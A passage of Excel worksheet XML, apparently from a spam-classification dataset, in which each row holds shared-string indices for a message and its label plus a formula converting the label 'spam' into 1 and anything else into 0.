    <row r="3947" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3947" t="s">
        <v>9005</v>
      </c>
      <c r="B3947" t="s">
        <v>5294</v>
      </c>
      <c r="C3947" s="1">
        <f>IF(B3947="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3948" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3948" t="s">
        <v>9006</v>
      </c>
      <c r="B3948" t="s">
        <v>5294</v>
      </c>
      <c r="C3948" s="1">
        <f>IF(B3948="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3949" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3949" t="s">
        <v>9007</v>
      </c>
      <c r="B3949" t="s">
        <v>5294</v>
      </c>
      <c r="C3949" s="1">
        <f>IF(B3949="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3950" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3950" t="s">
        <v>9008</v>
      </c>
      <c r="B3950" t="s">
        <v>5294</v>
      </c>
      <c r="C3950" s="1">
        <f>IF(B3950="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3951" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3951" t="s">
        <v>9009</v>
      </c>
      <c r="B3951" t="s">
        <v>5294</v>
      </c>
      <c r="C3951" s="1">
        <f>IF(B3951="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3952" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3952" t="s">
        <v>9010</v>
      </c>
      <c r="B3952" t="s">
        <v>5294</v>
      </c>
      <c r="C3952" s="1">
        <f>IF(B3952="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3953" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3953" t="s">
        <v>9011</v>
      </c>
      <c r="B3953" t="s">
        <v>5294</v>
      </c>
      <c r="C3953" s="1">
        <f>IF(B3953="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3954" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3954" t="s">
        <v>9012</v>
      </c>
      <c r="B3954" t="s">
        <v>5297</v>
      </c>
      <c r="C3954" s="1">
        <f>IF(B3954="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3955" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3955" t="s">
        <v>9013</v>
      </c>
      <c r="B3955" t="s">
        <v>5294</v>
      </c>
      <c r="C3955" s="1">
        <f>IF(B3955="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3956" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3956" t="s">
        <v>9014</v>
      </c>
      <c r="B3956" t="s">
        <v>5294</v>
      </c>
      <c r="C3956" s="1">
        <f>IF(B3956="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3957" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3957" t="s">
        <v>9015</v>
      </c>
      <c r="B3957" t="s">
        <v>5294</v>
      </c>
      <c r="C3957" s="1">
        <f>IF(B3957="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3958" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3958" t="s">
        <v>9016</v>
      </c>
      <c r="B3958" t="s">
        <v>5294</v>
      </c>
      <c r="C3958" s="1">
        <f>IF(B3958="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3959" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3959" t="s">
        <v>9017</v>
      </c>
      <c r="B3959" t="s">
        <v>5294</v>
      </c>
      <c r="C3959" s="1">
        <f>IF(B3959="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3960" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3960" t="s">
        <v>9018</v>
      </c>
      <c r="B3960" t="s">
        <v>5294</v>
      </c>
      <c r="C3960" s="1">
        <f>IF(B3960="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3961" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3961" t="s">
        <v>9019</v>
      </c>
      <c r="B3961" t="s">
        <v>5294</v>
      </c>
      <c r="C3961" s="1">
        <f>IF(B3961="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3962" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3962" t="s">
        <v>9020</v>
      </c>
      <c r="B3962" t="s">
        <v>5294</v>
      </c>
      <c r="C3962" s="1">
        <f>IF(B3962="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3963" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3963" t="s">
        <v>9021</v>
      </c>
      <c r="B3963" t="s">
        <v>5297</v>
      </c>
      <c r="C3963" s="1">
        <f>IF(B3963="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3964" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3964" t="s">
        <v>9022</v>
      </c>
      <c r="B3964" t="s">
        <v>5294</v>
      </c>
      <c r="C3964" s="1">
        <f>IF(B3964="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3965" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3965" t="s">
        <v>9023</v>
      </c>
      <c r="B3965" t="s">
        <v>5294</v>
      </c>
      <c r="C3965" s="1">
        <f>IF(B3965="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3966" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3966" t="s">
        <v>5764</v>
      </c>
      <c r="B3966" t="s">
        <v>5294</v>
      </c>
      <c r="C3966" s="1">
        <f>IF(B3966="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3967" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3967" t="s">
        <v>9024</v>
      </c>
      <c r="B3967" t="s">
        <v>5294</v>
      </c>
      <c r="C3967" s="1">
        <f>IF(B3967="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3968" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3968" t="s">
        <v>9025</v>
      </c>
      <c r="B3968" t="s">
        <v>5297</v>
      </c>
      <c r="C3968" s="1">
        <f>IF(B3968="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3969" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3969" t="s">
        <v>9026</v>
      </c>
      <c r="B3969" t="s">
        <v>5294</v>
      </c>
      <c r="C3969" s="1">
        <f>IF(B3969="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3970" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3970" t="s">
        <v>9027</v>
      </c>
      <c r="B3970" t="s">
        <v>5294</v>
      </c>
      <c r="C3970" s="1">
        <f>IF(B3970="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3971" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3971" t="s">
        <v>9028</v>
      </c>
      <c r="B3971" t="s">
        <v>5294</v>
      </c>
      <c r="C3971" s="1">
        <f>IF(B3971="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3972" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3972" t="s">
        <v>9029</v>
      </c>
      <c r="B3972" t="s">
        <v>5297</v>
      </c>
      <c r="C3972" s="1">
        <f>IF(B3972="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3973" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3973" t="s">
        <v>9030</v>
      </c>
      <c r="B3973" t="s">
        <v>5294</v>
      </c>
      <c r="C3973" s="1">
        <f>IF(B3973="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3974" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3974" t="s">
        <v>9031</v>
      </c>
      <c r="B3974" t="s">
        <v>5294</v>
      </c>
      <c r="C3974" s="1">
        <f>IF(B3974="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3975" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3975" t="s">
        <v>9032</v>
      </c>
      <c r="B3975" t="s">
        <v>5294</v>
      </c>
      <c r="C3975" s="1">
        <f>IF(B3975="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3976" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3976" t="s">
        <v>9033</v>
      </c>
      <c r="B3976" t="s">
        <v>5294</v>
      </c>
      <c r="C3976" s="1">
        <f>IF(B3976="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3977" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3977" t="s">
        <v>9034</v>
      </c>
      <c r="B3977" t="s">
        <v>5294</v>
      </c>
      <c r="C3977" s="1">
        <f>IF(B3977="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3978" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3978" t="s">
        <v>7884</v>
      </c>
      <c r="B3978" t="s">
        <v>5297</v>
      </c>
      <c r="C3978" s="1">
        <f>IF(B3978="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3979" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3979" t="s">
        <v>9035</v>
      </c>
      <c r="B3979" t="s">
        <v>5294</v>
      </c>
      <c r="C3979" s="1">
        <f>IF(B3979="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3980" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3980" t="s">
        <v>9036</v>
      </c>
      <c r="B3980" t="s">
        <v>5294</v>
      </c>
      <c r="C3980" s="1">
        <f>IF(B3980="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3981" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3981" t="s">
        <v>9037</v>
      </c>
      <c r="B3981" t="s">
        <v>5297</v>
      </c>
      <c r="C3981" s="1">
        <f>IF(B3981="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3982" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3982" t="s">
        <v>9038</v>
      </c>
      <c r="B3982" t="s">
        <v>5294</v>
      </c>
      <c r="C3982" s="1">
        <f>IF(B3982="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3983" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3983" t="s">
        <v>9039</v>
      </c>
      <c r="B3983" t="s">
        <v>5294</v>
      </c>
      <c r="C3983" s="1">
        <f>IF(B3983="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3984" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3984" t="s">
        <v>9040</v>
      </c>
      <c r="B3984" t="s">
        <v>5294</v>
      </c>
      <c r="C3984" s="1">
        <f>IF(B3984="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3985" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3985" t="s">
        <v>9041</v>
      </c>
      <c r="B3985" t="s">
        <v>5294</v>
      </c>
      <c r="C3985" s="1">
        <f>IF(B3985="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3986" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3986" t="s">
        <v>9042</v>
      </c>
      <c r="B3986" t="s">
        <v>5294</v>
      </c>
      <c r="C3986" s="1">
        <f>IF(B3986="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3987" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3987" t="s">
        <v>6724</v>
      </c>
      <c r="B3987" t="s">
        <v>5294</v>
      </c>
      <c r="C3987" s="1">
        <f>IF(B3987="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3988" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3988" t="s">
        <v>9043</v>
      </c>
      <c r="B3988" t="s">
        <v>5297</v>
      </c>
      <c r="C3988" s="1">
        <f>IF(B3988="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3989" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3989" t="s">
        <v>9044</v>
      </c>
      <c r="B3989" t="s">
        <v>5294</v>
      </c>
      <c r="C3989" s="1">
        <f>IF(B3989="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3990" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3990" t="s">
        <v>9045</v>
      </c>
      <c r="B3990" t="s">
        <v>5294</v>
      </c>
      <c r="C3990" s="1">
        <f>IF(B3990="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3991" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3991" t="s">
        <v>9046</v>
      </c>
      <c r="B3991" t="s">
        <v>5297</v>
      </c>
      <c r="C3991" s="1">
        <f>IF(B3991="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3992" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3992" t="s">
        <v>7936</v>
      </c>
      <c r="B3992" t="s">
        <v>5294</v>
      </c>
      <c r="C3992" s="1">
        <f>IF(B3992="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3993" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3993" t="s">
        <v>9047</v>
      </c>
      <c r="B3993" t="s">
        <v>5294</v>
      </c>
      <c r="C3993" s="1">
        <f>IF(B3993="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3994" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3994" t="s">
        <v>9048</v>
      </c>
      <c r="B3994" t="s">
        <v>5294</v>
      </c>
      <c r="C3994" s="1">
        <f>IF(B3994="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3995" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3995" t="s">
        <v>9049</v>
      </c>
      <c r="B3995" t="s">
        <v>5294</v>
      </c>
      <c r="C3995" s="1">
        <f>IF(B3995="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3996" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3996" t="s">
        <v>9050</v>
      </c>
      <c r="B3996" t="s">
        <v>5294</v>
      </c>
      <c r="C3996" s="1">
        <f>IF(B3996="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3997" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3997" t="s">
        <v>9051</v>
      </c>
      <c r="B3997" t="s">
        <v>5294</v>
      </c>
      <c r="C3997" s="1">
        <f>IF(B3997="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3998" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3998" t="s">
        <v>9052</v>
      </c>
      <c r="B3998" t="s">
        <v>5297</v>
      </c>
      <c r="C3998" s="1">
        <f>IF(B3998="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3999" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3999" t="s">
        <v>9053</v>
      </c>
      <c r="B3999" t="s">
        <v>5297</v>
      </c>
      <c r="C3999" s="1">
        <f>IF(B3999="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4000" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4000" t="s">
        <v>9054</v>
      </c>
      <c r="B4000" t="s">
        <v>5294</v>
      </c>
      <c r="C4000" s="1">
        <f>IF(B4000="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4001" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4001" t="s">
        <v>9055</v>
      </c>
      <c r="B4001" t="s">
        <v>5297</v>
      </c>
      <c r="C4001" s="1">
        <f>IF(B4001="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4002" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4002" t="s">
        <v>9056</v>
      </c>
      <c r="B4002" t="s">
        <v>5294</v>
      </c>
      <c r="C4002" s="1">
        <f>IF(B4002="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4003" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4003" t="s">
        <v>9057</v>
      </c>
      <c r="B4003" t="s">
        <v>5294</v>
      </c>
      <c r="C4003" s="1">
        <f>IF(B4003="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4004" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4004" t="s">
        <v>6665</v>
      </c>
      <c r="B4004" t="s">
        <v>5294</v>
      </c>
      <c r="C4004" s="1">
        <f>IF(B4004="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4005" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4005" t="s">
        <v>9058</v>
      </c>
      <c r="B4005" t="s">
        <v>5294</v>
      </c>
      <c r="C4005" s="1">
        <f>IF(B4005="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4006" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4006" t="s">
        <v>9059</v>
      </c>
      <c r="B4006" t="s">
        <v>5294</v>
      </c>
      <c r="C4006" s="1">
        <f>IF(B4006="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4007" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4007" t="s">
        <v>9060</v>
      </c>
      <c r="B4007" t="s">
        <v>5294</v>
      </c>
      <c r="C4007" s="1">
        <f>IF(B4007="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4008" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4008" t="s">
        <v>9061</v>
      </c>
      <c r="B4008" t="s">
        <v>5294</v>
      </c>
      <c r="C4008" s="1">
        <f>IF(B4008="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4009" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4009" t="s">
        <v>9062</v>
      </c>
      <c r="B4009" t="s">
        <v>5294</v>
      </c>
      <c r="C4009" s="1">
        <f>IF(B4009="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4010" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4010" t="s">
        <v>9063</v>
      </c>
      <c r="B4010" t="s">
        <v>5294</v>
      </c>
      <c r="C4010" s="1">
        <f>IF(B4010="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4011" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4011" t="s">
        <v>8592</v>
      </c>
      <c r="B4011" t="s">
        <v>5297</v>
      </c>
      <c r="C4011" s="1">
        <f>IF(B4011="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4012" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4012" t="s">
        <v>5481</v>
      </c>
      <c r="B4012" t="s">
        <v>5297</v>
      </c>
      <c r="C4012" s="1">
        <f>IF(B4012="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4013" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4013" t="s">
        <v>9064</v>
      </c>
      <c r="B4013" t="s">
        <v>5294</v>
      </c>
      <c r="C4013" s="1">
        <f>IF(B4013="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4014" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4014" t="s">
        <v>7392</v>
      </c>
      <c r="B4014" t="s">
        <v>5294</v>
      </c>
      <c r="C4014" s="1">
        <f>IF(B4014="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4015" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4015" t="s">
        <v>9065</v>
      </c>
      <c r="B4015" t="s">
        <v>5294</v>
      </c>
      <c r="C4015" s="1">
        <f>IF(B4015="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4016" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4016" t="s">
        <v>9066</v>
      </c>
      <c r="B4016" t="s">
        <v>5297</v>
      </c>
      <c r="C4016" s="1">
        <f>IF(B4016="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4017" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4017" t="s">
        <v>9067</v>
      </c>
      <c r="B4017" t="s">
        <v>5294</v>
      </c>
      <c r="C4017" s="1">
        <f>IF(B4017="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4018" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4018" t="s">
        <v>9068</v>
      </c>
      <c r="B4018" t="s">
        <v>5294</v>
      </c>
      <c r="C4018" s="1">
        <f>IF(B4018="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4019" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4019" t="s">
        <v>9069</v>
      </c>
      <c r="B4019" t="s">
        <v>5294</v>
      </c>
      <c r="C4019" s="1">
        <f>IF(B4019="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4020" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4020" t="s">
        <v>9070</v>
      </c>
      <c r="B4020" t="s">
        <v>5297</v>
      </c>
      <c r="C4020" s="1">
        <f>IF(B4020="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4021" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4021" t="s">
        <v>9071</v>
      </c>
      <c r="B4021" t="s">
        <v>5294</v>
      </c>
      <c r="C4021" s="1">
        <f>IF(B4021="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4022" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4022" t="s">
        <v>9072</v>
      </c>
      <c r="B4022" t="s">
        <v>5294</v>
      </c>
      <c r="C4022" s="1">
        <f>IF(B4022="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4023" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4023" t="s">
        <v>9073</v>
      </c>
      <c r="B4023" t="s">
        <v>5294</v>
      </c>
      <c r="C4023" s="1">
        <f>IF(B4023="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4024" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4024" t="s">
        <v>9074</v>
      </c>
      <c r="B4024" t="s">
        <v>5294</v>
      </c>
      <c r="C4024" s="1">
        <f>IF(B4024="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4025" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4025" t="s">
        <v>9075</v>
      </c>
      <c r="B4025" t="s">
        <v>5294</v>
      </c>
      <c r="C4025" s="1">
        <f>IF(B4025="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4026" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4026" t="s">
        <v>9076</v>
      </c>
      <c r="B4026" t="s">
        <v>5294</v>
      </c>
      <c r="C4026" s="1">
        <f>IF(B4026="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4027" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4027" t="s">
        <v>9077</v>
      </c>
      <c r="B4027" t="s">
        <v>5294</v>
      </c>
      <c r="C4027" s="1">
        <f>IF(B4027="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4028" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4028" t="s">
        <v>9078</v>
      </c>
      <c r="B4028" t="s">
        <v>5294</v>
      </c>
      <c r="C4028" s="1">
        <f>IF(B4028="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4029" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4029" t="s">
        <v>9079</v>
      </c>
      <c r="B4029" t="s">
        <v>5294</v>
      </c>
      <c r="C4029" s="1">
        <f>IF(B4029="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4030" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4030" t="s">
        <v>9080</v>
      </c>
      <c r="B4030" t="s">
        <v>5294</v>
      </c>
      <c r="C4030" s="1">
        <f>IF(B4030="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4031" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4031" t="s">
        <v>9081</v>
      </c>
      <c r="B4031" t="s">
        <v>5294</v>
      </c>
      <c r="C4031" s="1">
        <f>IF(B4031="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4032" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4032" t="s">
        <v>9082</v>
      </c>
      <c r="B4032" t="s">
        <v>5294</v>
      </c>
      <c r="C4032" s="1">
        <f>IF(B4032="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4033" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4033" t="s">
        <v>9083</v>
      </c>
      <c r="B4033" t="s">
        <v>5294</v>
      </c>
      <c r="C4033" s="1">
        <f>IF(B4033="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4034" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4034" t="s">
        <v>9084</v>
      </c>
      <c r="B4034" t="s">
        <v>5294</v>
      </c>
      <c r="C4034" s="1">
        <f>IF(B4034="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4035" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4035" t="s">
        <v>9085</v>
      </c>
      <c r="B4035" t="s">
        <v>5294</v>
      </c>
      <c r="C4035" s="1">
        <f>IF(B4035="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4036" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4036" t="s">
        <v>9086</v>
      </c>
      <c r="B4036" t="s">
        <v>5297</v>
      </c>
      <c r="C4036" s="1">
        <f>IF(B4036="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4037" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4037" t="s">
        <v>9087</v>
      </c>
      <c r="B4037" t="s">
        <v>5294</v>
      </c>
      <c r="C4037" s="1">
        <f>IF(B4037="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4038" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4038" t="s">
        <v>9088</v>
      </c>
      <c r="B4038" t="s">
        <v>5294</v>
      </c>
      <c r="C4038" s="1">
        <f>IF(B4038="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4039" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4039" t="s">
        <v>9089</v>
      </c>
      <c r="B4039" t="s">
        <v>5294</v>
      </c>
      <c r="C4039" s="1">
        <f>IF(B4039="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4040" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4040" t="s">
        <v>5590</v>
      </c>
      <c r="B4040" t="s">
        <v>5294</v>
      </c>
      <c r="C4040" s="1">
        <f>IF(B4040="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4041" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4041" t="s">
        <v>9090</v>
      </c>
      <c r="B4041" t="s">
        <v>5294</v>
      </c>
      <c r="C4041" s="1">
        <f>IF(B4041="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4042" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4042" t="s">
        <v>5481</v>
      </c>
      <c r="B4042" t="s">
        <v>5297</v>
      </c>
      <c r="C4042" s="1">
        <f>IF(B4042="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4043" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4043" t="s">
        <v>9091</v>
      </c>
      <c r="B4043" t="s">
        <v>5294</v>
      </c>
      <c r="C4043" s="1">
        <f>IF(B4043="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4044" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4044" t="s">
        <v>9092</v>
      </c>
      <c r="B4044" t="s">
        <v>5294</v>
      </c>
      <c r="C4044" s="1">
        <f>IF(B4044="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4045" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4045" t="s">
        <v>9093</v>
      </c>
      <c r="B4045" t="s">
        <v>5294</v>
      </c>
      <c r="C4045" s="1">
        <f>IF(B4045="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4046" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4046" t="s">
        <v>9094</v>
      </c>
      <c r="B4046" t="s">
        <v>5294</v>
      </c>
      <c r="C4046" s="1">
        <f>IF(B4046="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4047" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4047" t="s">
        <v>9095</v>
      </c>
      <c r="B4047" t="s">
        <v>5297</v>
      </c>
      <c r="C4047" s="1">
        <f>IF(B4047="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4048" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4048" t="s">
        <v>9096</v>
      </c>
      <c r="B4048" t="s">
        <v>5297</v>
      </c>
      <c r="C4048" s="1">
        <f>IF(B4048="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4049" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4049" t="s">
        <v>9097</v>
      </c>
      <c r="B4049" t="s">
        <v>5294</v>
      </c>
      <c r="C4049" s="1">
        <f>IF(B4049="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4050" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4050" t="s">
        <v>9098</v>
      </c>
      <c r="B4050" t="s">
        <v>5294</v>
      </c>
      <c r="C4050" s="1">
        <f>IF(B4050="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
